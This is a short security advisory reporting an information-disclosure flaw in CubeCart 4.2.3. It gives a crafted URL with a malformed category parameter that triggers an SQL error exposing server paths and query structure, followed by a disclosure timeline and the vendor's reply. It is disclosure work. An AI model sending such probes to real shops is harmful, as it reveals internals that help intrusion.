Application:		CubeCart 4.2.3
Authors Site:		http://www.cubecart.com/

+--------------------------------------------------------------+

Information Disclosure:

http://www.victim.com/cubecart/index.php?searchStr=foobar&_a=viewCat&priceMin=1&priceMax=2&inStock=on&category[]='

Result:

Warning: implode() [function.implode]: Bad arguments. in /var/www/cubecart/includes/content/viewCat.inc.php on line 157
MySQL Error Occurred

Error Message:
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND C.cat_id = I.cat_id AND C.hide = '0' AND (C.cat_desc != '##HIDDEN##' OR C.' at line 1

SQL:
SELECT DISTINCT(I.productId), I.*, MATCH (I.description,I.name,I.productCode) AGAINST('foobar') AS SearchScore FROM CubeCart_inventory AS I, CubeCart_category AS C WHERE (MATCH (I.description,I.name,I.productCode) AGAINST('foobar')) >= 0.500000 AND C.cat_id > 0 AND I.price >= 1 AND I.price <= 2 AND ((I.useStockLevel = 0) OR (I.useStockLevel = 1 AND I.stock_level > 0)) AND I.cat_id IN () AND C.cat_id = I.cat_id AND C.hide = '0' AND (C.cat_desc != '##HIDDEN##' OR C.cat_desc IS NULL) AND I.disabled = '0' ORDER BY SearchScore DESC

+-[Notes:]-----------------------------------------------------+

Vulnerabilities found on: 04/11/2008
Author(s) Informed on: 04/11/2008
Author(s) Response: 05/11/2008
Author(s) Fix: NONE - See Below:
Secured By: http://www.gulftech.org/verify.php?4900335a14c27d2692570e74a5f8ee0b

Authors response:

ALL input to CubeCart is filtered for XSS and SQL injection, so I'm not too concerned about that.  But there's no way to keep people from jacking with the URL trying to get info.  We go through a rigorous, expensive 3rd party security audit prior to every release to make sure there aren't any issues.  What you're seeing is nothing at all to be concerned with.


JohnC@NoBytes.com

http://www.NoBytes.com